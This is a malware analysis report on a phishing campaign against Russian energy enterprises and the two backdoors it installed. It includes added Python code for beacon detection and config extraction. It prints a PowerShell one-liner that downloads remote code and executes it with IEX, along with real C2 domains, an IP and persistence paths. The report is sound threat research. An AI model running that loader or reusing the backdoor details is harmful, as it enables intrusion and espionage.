Investigating a targeted spy attack on the Russian fuel and energy complex


Our experience investigating computer security incidents shows that email remains one of the most common ways attackers gain initial access to the networks they target. A single careless action with a suspicious (or not so suspicious) message becomes the entry point for further infection, which is why cybercriminals actively use social engineering techniques, albeit with varying degrees of success.

In this post we want to talk about our recent investigation of a spam campaign aimed at several enterprises of the Russian fuel and energy complex. All of the attacks followed the same scenario using fake emails, and nobody seems to have put much effort into the text of those emails.

Reconnaissance

It all started at the end of April 2020, when Doctor Web virus analysts noticed a spam campaign in which the attackers sent an updated telephone directory to employees of several enterprises of the Russian fuel and energy complex. Of course, this was not a simple courtesy: the directory was not genuine, and the .docx documents loaded two images from remote resources.

One of them was loaded onto the user's computer from the news[.]zannews[.]com server. It is noteworthy that the domain name resembles the domain of the Kazakh anti-corruption media centre, zannews[.]kz. On the other hand, the domain used immediately brought to mind another campaign from 2015, known as TOPNEWS, which used the ICEFOG backdoor and had Trojan control domains containing the substring "news" in their names. Another interesting detail is that when emails were sent to different recipients, the image download requests used either different request parameters or different image names.

We believe this was done to gather information in order to identify a "reliable" recipient, one who could be counted on to open the email at the right moment. The SMB protocol was used to load the image from the second server, which could have been done to collect NetNTLM hashes from the computers of employees who opened the received document.

And here is the email itself with the fake directory:

[Image: the email with the fake telephone directory]

In June of this year, the attackers began using a new domain name, sports[.]manhajnews[.]com, to host the images. Analysis showed that manhajnews[.]com subdomains had been used in spam mailings since approximately September 2019. One of the targets of that campaign was a large Russian university.

Also in June, the organizers of the attack came up with a new text for their emails: this time the document contained information about the development of the industry. The wording of the email made it clear that its author was either not a native Russian speaker or was deliberately creating that impression. Unfortunately, the ideas on industry development, as always, turned out to be just a cover: the document downloaded two images, and the server was changed to download[.]inklingpaper[.]com.

The next innovation followed in July. In an attempt to evade detection of the malicious documents by antivirus programs, the attackers began using password-protected Microsoft Word documents. At the same time, they decided to use a classic social engineering technique: a bonus notification.

[Image: the bonus notification email]

The text of the message was again written in the same style, which raised additional suspicion among the recipients. The image hosting server did not change either.

Note that in all cases, mailboxes registered on the mail[.]ru and yandex[.]ru domains were used to send the emails.

Attack

By September 2020 it was time to act. Our virus analysts recorded a new wave of attacks in which the attackers again sent emails under the pretext of an updated telephone directory. This time, however, the attachment contained a malicious macro.

When the attached document was opened, the macro created two files:

  • the VBS script %APPDATA%\microsoft\windows\start menu\programs\startup\adoba.vbs, intended to launch a batch file;
  • the batch file itself, %APPDATA%\configs\test.bat, which was obfuscated.

[Image: the obfuscated batch file]

The essence of its work comes down to launching a PowerShell shell with certain parameters. The parameters passed to the shell decode into the following commands:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;

As follows from the command shown, the domain from which the payload is fetched is once again disguised as a news site. The payload is a simple loader whose only task is to receive shellcode from the command and control server and execute it. We were able to identify two types of backdoor that could be installed on the victim's PC.

BackDoor.Siggen2.3238

The first is BackDoor.Siggen2.3238. Our specialists had not encountered it before, and there were no mentions of this program by other antivirus vendors either.

This program is a backdoor written in C++ and runs on 32-bit Windows operating systems.

BackDoor.Siggen2.3238 can communicate with the control server over two protocols: HTTP and HTTPS. The analyzed sample uses HTTPS. The following User-Agent is used in requests to the server:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)

All requests are accompanied by the following set of parameters:

%s;type=%s;length=%s;realdata=%send

where each %s is replaced, in order, by:

  • the ID of the infected computer,
  • the type of request being sent,
  • the length of the data in the realdata field,
  • the data itself.

At the stage of collecting information about the infected system, the backdoor generates a string of the form:

lan=%s;cmpname=%s;username=%s;version=%s;

where lan is the IP address of the infected computer, cmpname is the computer name, username is the user name, and version is the string 0.0.4.03.

This information, with the sysinfo identifier, is sent in a POST request to the control server at https[:]//31.214[.]157.14/log.txt. If in response BackDoor.Siggen2.3238 receives the HEART signal, the connection is considered successful and the backdoor enters its main communication loop with the server.
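As an added illustration (this is not code from the article or from Doctor Web), the following Python parses beacons of the format described above, validates the length field against the realdata payload, extracts the sysinfo fields, and applies a simple detection rule (the quoted User-Agent plus a well-formed beacon body) to a set of constructed request records such as an inspecting proxy or sandbox might log. The bot ID, host names and user name in the sample records are constructed values; the C2 URL is the one named in the article.

```python
# Added example (not code from the article or from Doctor Web): parse and
# validate BackDoor.Siggen2.3238 beacons and flag matching request records.
import re

# User-Agent string quoted in the article.
SIGGEN_UA = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)"

# Body layout "%s;type=%s;length=%s;realdata=%send": the literal "end"
# terminator follows the realdata value.
BEACON_RE = re.compile(
    r"^(?P<id>[^;]+);type=(?P<type>[^;]+);length=(?P<length>\d+);"
    r"realdata=(?P<data>.*)end$", re.S)

def build_beacon(bot_id, req_type, data):
    """Constructed beacon body; mirrors the format string so the parser can
    be exercised offline."""
    return f"{bot_id};type={req_type};length={len(data)};realdata={data}end"

def parse_beacon(body):
    """Return the decoded beacon, or None when the body does not fit the
    format or its length field disagrees with the realdata payload."""
    m = BEACON_RE.match(body)
    if not m:
        return None
    data = m.group("data")
    if int(m.group("length")) != len(data):
        return None
    fields = {}
    if m.group("type") == "sysinfo":
        # "lan=%s;cmpname=%s;username=%s;version=%s;" -> key/value pairs
        for kv in data.split(";"):
            if "=" in kv:
                k, v = kv.split("=", 1)
                fields[k] = v
    return {"id": m.group("id"), "type": m.group("type"),
            "data": data, "fields": fields}

def is_siggen_beacon(record):
    """Detection rule: exact User-Agent, POST method and a well-formed body."""
    return (record.get("user_agent") == SIGGEN_UA
            and record.get("method") == "POST"
            and parse_beacon(record.get("body", "")) is not None)

# Constructed request records (bot ID, host and user names are made up).
SAMPLE_RECORDS = [
    {"method": "POST", "url": "https://31.214.157.14/log.txt", "user_agent": SIGGEN_UA,
     "body": build_beacon("A1B2C3D4", "sysinfo",
                          "lan=10.0.0.5;cmpname=WS-17;username=jdoe;version=0.0.4.03;")},
    {"method": "GET", "url": "https://31.214.157.14/", "user_agent": SIGGEN_UA, "body": ""},
    # Same C2 path but a different client and a length field that lies.
    {"method": "POST", "url": "https://31.214.157.14/log.txt", "user_agent": "curl/7.68.0",
     "body": "A1B2C3D4;type=sysinfo;length=999;realdata=x;end"},
]

def flagged(records=SAMPLE_RECORDS):
    """URLs of the records the rule matches."""
    return [r["url"] for r in records if is_siggen_beacon(r)]

if __name__ == "__main__":
    for r in SAMPLE_RECORDS:
        print(is_siggen_beacon(r), parse_beacon(r["body"]))
```

The length check matters in practice: a body that merely contains the keywords but whose length field does not equal the realdata size is rejected, which keeps the rule from matching unrelated traffic that happens to share a few tokens.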

A more complete description of how BackDoor.Siggen2.3238 operates is available in our virus library.

BackDoor.Whitebird.23

The second program is a modification of the BackDoor.Whitebird backdoor, already known to us from an incident involving a government agency in Kazakhstan. This version is written in C++ and is designed to run on both 32-bit and 64-bit Windows operating systems.

Like most programs of this kind, BackDoor.Whitebird.23 is designed to establish an encrypted connection with the control server and to give unauthorized control over the infected computer. It is installed on the compromised system by the dropper BackDoor.Siggen2.3244.

The sample we analyzed was a malicious library with two exported functions:

  • Google Play
  • Test

At the start of its work, it decrypts the configuration hardcoded in the backdoor body using an algorithm based on XOR with the byte 0x99. The configuration looks like this:


struct st_cfg
{
  _DWORD dword0;
  wchar_t campaign[64];
  wchar_t cnc_addr[256];
  _DWORD cnc_port;
  wchar_t cnc_addr2[100];
  wchar_t cnc_addr3[100];
  _BYTE working_hours[1440];
  wchar_t proxy_domain[50];
  _DWORD proxy_port;
  _DWORD proxy_type;
  _DWORD use_proxy;
  _BYTE proxy_login[50];
  _BYTE proxy_password[50];
  _BYTE gapa8c[256];
}; 

To keep itself running at all times, the backdoor changes the value stored in the working_hours configuration field. The field holds 1440 bytes, each taking the value 0 or 1 and representing one minute of each hour of the day. The backdoor creates a separate thread for each network interface; the thread listens on the interface and looks for proxy server authorization packets sent from the infected computer. When such a packet is detected, the backdoor adds the proxy server's details to its list. In addition, it checks for a configured proxy via the WinAPI function InternetQueryOptionW.

The program checks the current hour and minute and compares them with the data in the working_hours configuration field. If the value for the corresponding minute of the day is non-zero, a connection to the control server is initiated.
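An added example (not code from the article or from Doctor Web) of how an analyst can turn the description above into a config extractor: it XOR-decrypts a configuration blob with 0x99, maps it onto the st_cfg layout shown above (wchar_t taken as 2 bytes, little-endian, no padding), and evaluates the working_hours minute table the way the scheduler check does. The encrypted blob is constructed here from placeholder values (campaign name, C2 host c2.example.invalid, port 443, 09:00 to 17:59 enabled); the field names are the ones in the struct.

```python
# Added example (not code from the article or from Doctor Web): decrypt a
# constructed BackDoor.Whitebird.23 config, parse st_cfg, evaluate working_hours.
import struct

XOR_KEY = 0x99

# Field order and sizes follow the st_cfg struct (wchar_t = 2 bytes,
# little-endian, no padding). With this layout the final gap field starts
# at offset 0xA8C, which is exactly what the IDA name "gapa8c" encodes.
CFG_FMT = "<I128s512sI200s200s1440s100sIII50s50s256s"
CFG_SIZE = struct.calcsize(CFG_FMT)   # 2956 bytes

def xor_decrypt(blob, key=XOR_KEY):
    """Single-byte XOR; symmetric, so it also serves to build test blobs."""
    return bytes(b ^ key for b in blob)

def _wstr(raw):
    """Decode a zero-padded wchar_t buffer up to its first NUL."""
    return raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]

def _cstr(raw):
    return raw.split(b"\x00", 1)[0].decode("latin-1")

def parse_config(plain):
    """Map a decrypted st_cfg blob onto a dict keyed by the struct's field names."""
    (dword0, campaign, cnc_addr, cnc_port, cnc_addr2, cnc_addr3, working_hours,
     proxy_domain, proxy_port, proxy_type, use_proxy, proxy_login,
     proxy_password, _gap) = struct.unpack(CFG_FMT, plain[:CFG_SIZE])
    return {
        "dword0": dword0,
        "campaign": _wstr(campaign), "cnc_addr": _wstr(cnc_addr), "cnc_port": cnc_port,
        "cnc_addr2": _wstr(cnc_addr2), "cnc_addr3": _wstr(cnc_addr3),
        "working_hours": working_hours,
        "proxy_domain": _wstr(proxy_domain), "proxy_port": proxy_port,
        "proxy_type": proxy_type, "use_proxy": use_proxy,
        "proxy_login": _cstr(proxy_login), "proxy_password": _cstr(proxy_password),
    }

def may_connect(cfg, hour, minute):
    """One byte per minute of the day; a non-zero byte permits C2 contact."""
    return cfg["working_hours"][hour * 60 + minute] != 0

def always_on(cfg):
    """The article says the backdoor rewrites the table to stay active; a table
    of all non-zero bytes is the resulting tell-tale."""
    return all(cfg["working_hours"])

def build_sample_blob():
    """Constructed encrypted config with placeholder values."""
    hours = bytearray(1440)
    for m in range(9 * 60, 18 * 60):      # 09:00 .. 17:59 enabled
        hours[m] = 1
    w = lambda s, n: s.encode("utf-16-le").ljust(n, b"\x00")
    plain = struct.pack(CFG_FMT, 1, w("campaign-A", 128), w("c2.example.invalid", 512), 443,
                        w("", 200), w("", 200), bytes(hours), w("", 100), 0, 0, 0,
                        b"\x00" * 50, b"\x00" * 50, b"\x00" * 256)
    return xor_decrypt(plain)

if __name__ == "__main__":
    cfg = parse_config(xor_decrypt(build_sample_blob()))
    print(cfg["cnc_addr"], cfg["cnc_port"],
          may_connect(cfg, 10, 30), may_connect(cfg, 3, 0), always_on(cfg))
```

The struct size coming out at 2956 bytes, with the trailing gap at 0xA8C, is a useful sanity check that the field sizes were transcribed correctly before pointing the parser at a real decrypted blob.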

Establishing a connection to the server imitates the setup of a TLS 1.0 connection between client and server. The backdoor's body contains two buffers.

The first buffer contains a TLS 1.0 Client Hello packet.

[Image: the first buffer, the TLS 1.0 Client Hello packet]

The second buffer contains the TLS 1.0 Client Key Exchange packet with a key length of 0x100 bytes, a Change Cipher Spec and an Encrypted Handshake Message.

[Image: the second buffer, the Client Key Exchange, Change Cipher Spec and Encrypted Handshake Message packets]

When sending the Client Hello packet, the backdoor writes 4 bytes of the current time and 28 bytes of pseudo-random data into the Client Random field, computed as follows:


v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

The resulting packet is sent to the control server. The response (a Server Hello packet) is checked for:

  • conformance to TLS protocol version 1.0;
  • the timestamp (the first 4 bytes of the Random Data field) set by the client matching the timestamp set by the server;
  • the first 4 bytes after the timestamp in the Random Data field matching between client and server.

If these matches hold, the backdoor prepares the Client Key Exchange packet. To do so, it modifies the Public Key in the Client Key Exchange packet, as well as the Encryption IV and Encryption Data in the Encrypted Handshake Message packet.

The backdoor then receives a packet from the command and control server, checks that the TLS protocol version is 1.0, and then receives another 54 bytes (the packet body). This completes the connection setup.
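As an added example (not code from the article or from Doctor Web), the Python below reimplements the Client Random derivation from the pseudocode above and then inverts it: because the 28 bytes are just overlapping dwords of the configured C2 address plus a byte-swapped timestamp, XORed with 7*j, an analyst who has a captured Client Hello can recover the first eight wide characters of the C2 address, or check whether an observed Client Random matches a candidate C2 address. Assumptions: the 4-byte timestamp is the standard big-endian gmt_unix_time at the start of the Random field (which is what the byte swap in the pseudocode produces), cnc_addr is the wchar_t[256] field of the configuration (so &cnc_addr[i/4] is byte offset (i/4)*2 and the seven dwords overlap by two bytes), and c2.example.invalid is a placeholder host.

```python
# Added example (not code from the article or from Doctor Web): the
# BackDoor.Whitebird.23 Client Random derivation and its inverse.
import struct

def bswap32(v):
    """t = (v >> 24) + (b0 << 24) + (b1 << 16) + (b2 << 8): a byte swap."""
    return int.from_bytes(struct.pack("<I", v & 0xFFFFFFFF), "big")

def fake_client_random(unix_time, cnc_addr):
    """The 28 pseudo-random bytes the backdoor places after the timestamp."""
    # cnc_addr is a wchar_t[256] in the config: UTF-16-LE, zero padded.
    cnc = cnc_addr.encode("utf-16-le").ljust(512, b"\x00")
    t = bswap32(unix_time)
    rnd = bytearray(28)
    for i in range(0, 28, 4):
        # &cnc_addr[i / 4] on a wchar_t array is byte offset (i/4)*2, so the
        # seven dwords taken from the address overlap by two bytes each.
        off = (i // 4) * 2
        dw = (t + struct.unpack_from("<I", cnc, off)[0]) & 0xFFFFFFFF
        struct.pack_into("<I", rnd, i, dw)
    for j in range(28):
        rnd[j] ^= (7 * j) & 0xFF
    return bytes(rnd)

def recover_cnc_prefix(unix_time, client_random28):
    """Undo the XOR and the addition. The seven overlapping dwords cover
    bytes 0..15 of the wide string, i.e. its first eight characters."""
    t = bswap32(unix_time)
    raw = bytearray(b ^ ((7 * j) & 0xFF) for j, b in enumerate(client_random28))
    cnc = bytearray(16)
    for i in range(0, 28, 4):
        dw = (struct.unpack_from("<I", raw, i)[0] - t) & 0xFFFFFFFF
        struct.pack_into("<I", cnc, (i // 4) * 2, dw)
    return cnc.decode("utf-16-le", errors="replace").rstrip("\x00")

def matches_whitebird_random(unix_time, client_random28, candidate_cnc):
    """Detection helper: would the backdoor, configured with candidate_cnc,
    have produced exactly this Client Random at this timestamp?"""
    return fake_client_random(unix_time, candidate_cnc) == bytes(client_random28)

if __name__ == "__main__":
    ts = 1600000000                       # constructed gmt_unix_time
    cr = fake_client_random(ts, "c2.example.invalid")
    print(cr.hex())
    print(recover_cnc_prefix(ts, cr))     # -> c2.examp
```

Because the timestamp is sent in the clear and the per-byte XOR mask is fixed, the Client Random field leaks the start of the configured C2 address to anyone with the capture; that is the kind of structural tell a network detection can key on, independent of the specific server IP in a given sample.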

A more complete description of how BackDoor.Whitebird.23 operates is available in our virus library.

Conclusions

Analysis of the documents, the malware and the infrastructure used allows us to state with confidence that the attack was prepared by one of the Chinese APT groups. Given the functionality of the backdoors installed on victims' computers after a successful attack, infection leads, at a minimum, to the theft of confidential information from the computers of the targeted organizations.

Moreover, a very likely scenario is the installation of specialized Trojans on local servers with a particular role. These could be domain controllers, mail servers, Internet gateways, etc. As we saw in the example of the incident in Kazakhstan, such servers are of particular interest to attackers for a variety of reasons.

Source: www.habr.com
